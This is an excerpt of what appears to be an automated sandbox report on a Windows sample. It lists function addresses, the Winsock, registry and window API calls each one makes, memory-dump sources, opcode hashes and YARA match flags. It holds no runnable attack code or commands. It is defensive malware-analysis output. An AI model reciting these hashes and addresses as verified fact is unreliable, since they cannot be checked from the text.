                                    • socket.WS2_32(00000002,00000002,00000011), ref: 02423339
                                    • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 0242338A
                                    • select.WS2_32(?,00000000,00000000,00000000,0000001E), ref: 02423462
                                    • recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 02423491
                                    • closesocket.WS2_32(000000FF), ref: 02423521
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: closesocketrecvfromselectsendtosocket
                                    • String ID: @
                                    • API String ID: 4198204009-2766056989
                                    • Opcode ID: 6bd15b9e609f35c4d1bd856ffbe8256716a1e6fa29493330756a9dea09daf975
                                    • Instruction ID: 9fcc002ba9933d3c6c45031b164418b3d5bb131ed5d3b1e3b63b43241d666768
                                    • Opcode Fuzzy Hash: 6bd15b9e609f35c4d1bd856ffbe8256716a1e6fa29493330756a9dea09daf975
                                    • Instruction Fuzzy Hash: 24515C70D042689BEB28CF15CC94BE9BB75AF45304F9081DAE28DA7280DBB45EC9CF40
                                    Function 004C00C4 Relevance: 10.6, APIs: 7, Instructions: 122windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32(?), ref: 004C00F8
                                    • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004C0121
                                    • UpdateWindow.USER32(?), ref: 004C013D
                                    • SendMessageA.USER32(?,00000121,00000000,?), ref: 004C0163
                                    • SendMessageA.USER32(?,0000036A,00000000,00000001), ref: 004C0182
                                    • UpdateWindow.USER32(?), ref: 004C01C5
                                    • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004C01F8
                                      • Part of subcall function 004C0722: GetWindowLongA.USER32(?,000000F0), ref: 004C072E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Message$Window$PeekSendUpdate$LongParent
                                    • String ID:
                                    • API String ID: 2853195852-0
                                    • Opcode ID: d3abbe726d63c5f93680494a27610bd18d08b543cd94ade6c109ea003125bef2
                                    • Instruction ID: 4a7034fb6516b6935a61cde67c2eff25ba28458f8be2d3cb82e8272fb9b3d79f
                                    • Opcode Fuzzy Hash: d3abbe726d63c5f93680494a27610bd18d08b543cd94ade6c109ea003125bef2
                                    • Instruction Fuzzy Hash: 4941A138604341DBD7609F269C48F2BFAE8FFC1B54F144A2EF44192262DB7AC945CB5A
                                    Function 004C4962 Relevance: 10.6, APIs: 7, Instructions: 94windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004C608B: __EH_prolog.LIBCMT ref: 004C6090
                                      • Part of subcall function 004C0722: GetWindowLongA.USER32(?,000000F0), ref: 004C072E
                                    • SendMessageA.USER32(?,000001A1,00000000,00000000), ref: 004C49AB
                                    • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 004C49BA
                                    • SendMessageA.USER32(?,0000018E,00000000,00000000), ref: 004C49D3
                                    • SendMessageA.USER32(?,0000018E,00000000,00000000), ref: 004C49FB
                                    • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 004C4A0A
                                    • SendMessageA.USER32(?,00000198,?,?), ref: 004C4A20
                                    • PtInRect.USER32(?,000000FF,?), ref: 004C4A2C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$H_prologLongRectWindow
                                    • String ID:
                                    • API String ID: 2846605207-0
                                    • Opcode ID: e9f9d4f4326789e9f99e84767e45898bb7a6ecdf86fb453cb113f357bfca0859
                                    • Instruction ID: 830ba0f7b28581eef8bc847cb9887a689e71cc3fb4fe74b7079eb478761bdd5c
                                    • Opcode Fuzzy Hash: e9f9d4f4326789e9f99e84767e45898bb7a6ecdf86fb453cb113f357bfca0859
                                    • Instruction Fuzzy Hash: E1316A74A0020CFFDB10DF95CD81EAEB7B9EF44348B20806AF512A72A1D735AE12DB14
                                    Function 004B9F36 Relevance: 10.6, APIs: 7, Instructions: 80windowstringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(?,00001A04,?,?,?,?,00411732,0000F000), ref: 004B9F40
                                    • GetFocus.USER32 ref: 004B9F5B
                                      • Part of subcall function 004BE3D0: UnhookWindowsHookEx.USER32(?), ref: 004BE3F5
                                    • IsWindowEnabled.USER32(?), ref: 004B9F84
                                    • EnableWindow.USER32(?,00000000), ref: 004B9F96
                                    • EnableWindow.USER32(?,00000001), ref: 004B9FDF
                                    • IsWindow.USER32(?), ref: 004B9FE5
                                    • SetFocus.USER32(?), ref: 004B9FF3
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$EnableFocus$EnabledHookUnhookWindowslstrlen
                                    • String ID:
                                    • API String ID: 1607871872-0
                                    • Opcode ID: c77202b0e34b3ed68f3f41c3cec8d9c6e1dbe7b66fe2987cd85987eb49abaf13
                                    • Instruction ID: 8782ce226f7874449664f2234bfa548716e0c6190821589ed6a9f552181222e4
                                    • Opcode Fuzzy Hash: c77202b0e34b3ed68f3f41c3cec8d9c6e1dbe7b66fe2987cd85987eb49abaf13
                                    • Instruction Fuzzy Hash: 0B215171604700ABDB256F76DC46FAB7BE9EF80318F00442EF646C6291DB79E8018B79
                                    Function 004C6D7D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 004C6DAB
                                    • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 004C6DCE
                                    • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 004C6DED
                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 004C6DFD
                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 004C6E07
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CloseCreate$Open
                                    • String ID: software
                                    • API String ID: 1740278721-2010147023
                                    • Opcode ID: 2a582065395f459e0fc9b9dee37d98916167163ea514bf5ea614537983fca4d8
                                    • Instruction ID: 6b74acf408bb9f83d7b4d8f44e89dba49bb714df29179c27fe77c9440eb62aeb
                                    • Opcode Fuzzy Hash: 2a582065395f459e0fc9b9dee37d98916167163ea514bf5ea614537983fca4d8
                                    • Instruction Fuzzy Hash: 8B11C576D00158FBCB61DB9ACC84DEFFFBCEF89744F1140AAE505A2121E6719A01DBA4
                                    Function 0242D7CF Relevance: 10.1, APIs: 8, Instructions: 105stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 0242D7E8
                                      • Part of subcall function 024213E8: InterlockedExchange.KERNEL32(024340B8,?), ref: 02421406
                                    • lstrcat.KERNEL32(00000000,024A56EC), ref: 0242D816
                                    • lstrcat.KERNEL32(00000000,024A56F0), ref: 0242D83C
                                    • lstrcat.KERNEL32(00000000,024A56F4), ref: 0242D84B
                                    • lstrlen.KERNEL32(00000000), ref: 0242D8A6
                                    • lstrcat.KERNEL32(00000000,024A56F8), ref: 0242D8DA
                                    • lstrcat.KERNEL32(00000000,024A56FC), ref: 0242D900
                                    • lstrcat.KERNEL32(00000000,024A5700), ref: 0242D91D
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$ExchangeInterlocked
                                    • String ID:
                                    • API String ID: 3054446656-0
                                    • Opcode ID: 9874eb2c70b07ae74f8f25394bbf5c5aa6b434b06a594fb7a69d486b78d792ac
                                    • Instruction ID: a0ee14961ef32d2ef6ed146dea0f70adbb263aa9f938f553833262e05541139d
                                    • Opcode Fuzzy Hash: 9874eb2c70b07ae74f8f25394bbf5c5aa6b434b06a594fb7a69d486b78d792ac
                                    • Instruction Fuzzy Hash: 2B31B8B6E10214EBE7189FE6C9897AE3B67AF84701F50C43AF40A97381C678E558CF50
                                    Function 00431350 Relevance: 9.2, APIs: 6, Instructions: 176windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$ChildFocusVisible
                                    • String ID:
                                    • API String ID: 372613587-0
                                    • Opcode ID: 892d443b7913516ff50f812ea7d170fe72c60e4ead648f093291af7deafee84b
                                    • Instruction ID: 6c4be01287a71c19c165130a9754e02554fae4d68effc65eb54098582829d3b0
                                    • Opcode Fuzzy Hash: 892d443b7913516ff50f812ea7d170fe72c60e4ead648f093291af7deafee84b
                                    • Instruction Fuzzy Hash: E4518F716003059FD760EF25D880E6BB3E8FF88358F11492EF85687252DB38E805CBA9
                                    Function 00443FE0 Relevance: 9.1, APIs: 6, Instructions: 124COMMON
                                    Download Yara Rule
                                    APIs
                                    • CopyRect.USER32(?,00000000), ref: 00444022
                                    • IsRectEmpty.USER32(?), ref: 00444053
                                    • OffsetRect.USER32(?,00000000,?), ref: 004440A3
                                    • LPtoDP.GDI32(?,?,00000002), ref: 004440D8
                                    • GetClientRect.USER32(?,?), ref: 004440E7
                                    • IntersectRect.USER32(?,?,?), ref: 004440FC
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$ClientCopyEmptyIntersectOffset
                                    • String ID:
                                    • API String ID: 1743551499-0
                                    • Opcode ID: 33fd0192ae9e0a155400735406b22614a3db442c2f130f63c09eb2589a27549f
                                    • Instruction ID: f6d52f8687c23e98d088a80a11ccef2aaabad2755f102207e0fb2679e35da025
                                    • Opcode Fuzzy Hash: 33fd0192ae9e0a155400735406b22614a3db442c2f130f63c09eb2589a27549f
                                    • Instruction Fuzzy Hash: C34106B66046019FC318CF69C880E6BB7E9FBC8710F048A2EF556C7251DB74E905CB66
                                    Function 004B63F8 Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStringTypeW.KERNEL32(00000001,005ADC8C,00000001,-00000030,00000003,00000000,-00000030,?,00000000,004AAD21,00000000,0042B552,00000000), ref: 004B6437
                                    • GetStringTypeA.KERNEL32(00000000,00000001,005ADC88,00000001,?,?,00000000,004AAD21,00000000,0042B552,00000000), ref: 004B6451
                                    • GetStringTypeA.KERNEL32(-00000030,0042B552,00000000,004AAD21,00000000,00000003,00000000,-00000030,?,00000000,004AAD21,00000000,0042B552,00000000), ref: 004B6485
                                    • MultiByteToWideChar.KERNEL32(?,00000001,00000000,004AAD21,00000000,00000000,00000003,00000000,-00000030,?,00000000,004AAD21,00000000,0042B552,00000000), ref: 004B64BD
                                    • MultiByteToWideChar.KERNEL32(?,00000001,00000000,004AAD21,?,?,?,?,?,?,00000000,004AAD21,00000000,0042B552), ref: 004B6513
                                    • GetStringTypeW.KERNEL32(0042B552,?,00000000,00000000,?,?,?,?,?,?,00000000,004AAD21,00000000,0042B552), ref: 004B6525
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: StringType$ByteCharMultiWide
                                    • String ID:
                                    • API String ID: 3852931651-0
                                    • Opcode ID: 985f712ff3664372711b5e809a6120bb9d2f4c78dbfc977d15056527e554d00c
                                    • Instruction ID: cc1e9d8e6a840db466b381755a804c7d2851ef783b1dde00ae63bab49c1dfca5
                                    • Opcode Fuzzy Hash: 985f712ff3664372711b5e809a6120bb9d2f4c78dbfc977d15056527e554d00c
                                    • Instruction Fuzzy Hash: AE416BB2900259BFCF209F94DC86DEF7FB9FB19750F14452AF90592260C3398951CBA9
                                    Function 004359C0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: wsprintf
                                    • String ID: - $ - [$%d / %d]$?? / %d]
                                    • API String ID: 2111968516-3107364983
                                    • Opcode ID: 8cff9d79dd60dc64e04dbdd81467ab19290049f7b562f57dca516d804861825e
                                    • Instruction ID: 3f35b936be976e7546f3d39bcffc29be1b439987d4dc35cdf7877d82978d2018
                                    • Opcode Fuzzy Hash: 8cff9d79dd60dc64e04dbdd81467ab19290049f7b562f57dca516d804861825e
                                    • Instruction Fuzzy Hash: 90314F74608701AFC314EB59DCD1FABBBE4EB84714F008A1EF49683291DB78A905CB66
                                    Function 004C40C7 Relevance: 9.1, APIs: 6, Instructions: 67COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32(?), ref: 004C40FA
                                    • GetLastActivePopup.USER32(?), ref: 004C4109
                                    • IsWindowEnabled.USER32(?), ref: 004C411E
                                    • EnableWindow.USER32(?,00000000), ref: 004C4131
                                    • GetWindowLongA.USER32(?,000000F0), ref: 004C4143
                                    • GetParent.USER32(?), ref: 004C4151
                                    Memory Dump Source
